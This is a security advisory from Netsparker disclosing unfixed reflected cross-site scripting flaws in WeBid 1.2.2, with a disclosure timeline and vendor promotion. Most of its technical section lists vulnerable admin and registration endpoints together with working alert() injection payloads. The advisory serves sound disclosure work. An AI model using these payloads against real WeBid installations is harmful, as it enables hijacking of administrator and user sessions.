Multiple Reflected Cross-site Scripting Vulnerabilities in WeBid 1.2.2 Information -------------------- Advisory by Netsparker Name: Multiple Reflected Cross-site Scripting Vulnerabilities in WeBid 1.2.2 Affected Software: WeBid Affected Versions: 1.2.2 Homepage: http://www.webidsupport.com/ Vulnerability: Reflected Cross-site Scripting Severity: High Status: Not Fixed CVSS Score (3.0): 6.3 Netsparker Advisory Reference: NS-18-053 Technical Details -------------------- URL: http://{DOMAIN}/{PATH-OF-WEBID}/admin/deletenews.php?id='%22aa%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x001CF7)%3C/scRipt%3E&PAGE=1 Parameter Name: id Parameter Type: GET Attack Pattern: '"--> URL: http://{DOMAIN}/{PATH-OF-WEBID}/admin/editbannersuser.php?id='%22aa%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x00CE55)%3C/scRipt%3E Parameter Name: id Parameter Type: GET Attack Pattern: '"--> URL: http://{DOMAIN}/{PATH-OF-WEBID}/admin/editfaqscategory.php?id='%22aa%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x006597)%3C/scRipt%3E Parameter Name: id Parameter Type: GET Attack Pattern: '"--> URL: http://{DOMAIN}/{PATH-OF-WEBID}/admin/edituser.php?userid=1&offset='%22aa%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x002DFE)%3C/scRipt%3E Parameter Name: offset Parameter Type: GET Attack Pattern: '"> URL: http://{DOMAIN}/{PATH-OF-WEBID}/admin/excludeuser.php?id=x%22%20onmouseover=alert(0x002DFC)%20x=%22&offset=1 Parameter Name: id Parameter Type: GET Attack Pattern: x" onmouseover=alert(0x002DFC) x=" URL: http://{DOMAIN}/{PATH-OF-WEBID}/register.php Parameter Name: TPL_name Parameter Type: POST Attack Pattern: x" onmouseover=alert(0x004563) x=" URL: http://testcases-vdb.ns.local/webid/webid/register.php Parameter Name: TPL_address Parameter Type: POST Attack Pattern: x" onmouseover=alert(0x004563) x=" URL: http://{DOMAIN}/{PATH-OF-WEBID}/register.php Parameter Name: TPL_prov Parameter Type: POST Attack Pattern: x" onmouseover=alert(0x004563) x=" URL: http://{DOMAIN}/{PATH-OF-WEBID}/register.php Parameter Name: TPL_year Parameter Type: POST Attack Pattern: x" onmouseover=alert(0x004563) x=" URL: http://{DOMAIN}/{PATH-OF-WEBID}/register.php Parameter Name: TPL_phone Parameter Type: POST Attack Pattern: x" onmouseover=alert(0x004563) x=" URL: http://{DOMAIN}/{PATH-OF-WEBID}/register.php Parameter Name: TPL_email Parameter Type: POST Attack Pattern: x" onmouseover=alert(0x004563) x=" URL: http://{DOMAIN}/{PATH-OF-WEBID}/register.php Parameter Name: TPL_city Parameter Type: POST Attack Pattern: x" onmouseover=alert(0x004563) x=" URL: http://{DOMAIN}/{PATH-OF-WEBID}/register.php Parameter Name: TPL_zip Parameter Type: POST Attack Pattern: x" onmouseover=alert(0x004563) x=" URL: http://{DOMAIN}/{PATH-OF-WEBID}/register.php Parameter Name: TPL_nick Parameter Type: POST Attack Pattern: x" onmouseover=alert(0x004563) x=" URL: http://{DOMAIN}/{PATH-OF-WEBID}/user_login.php Parameter Name: username Parameter Type: POST Attack Pattern: x" onmouseover=alert(0x004563) x=" For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS). Advisory Timeline -------------------- 4th December 2018- First Contact 5th December 2018 - Details Sent 19th December 2018 - Attempted to Contact 23th January 2019 - Attempted to Contact 30th January 2019 - Advisory Released Credits & Authors -------------------- These issues have been discovered by Zekvan Arslan while testing Netsparker Web Application Security Scanner. About Netsparker -------------------- Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engineas unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.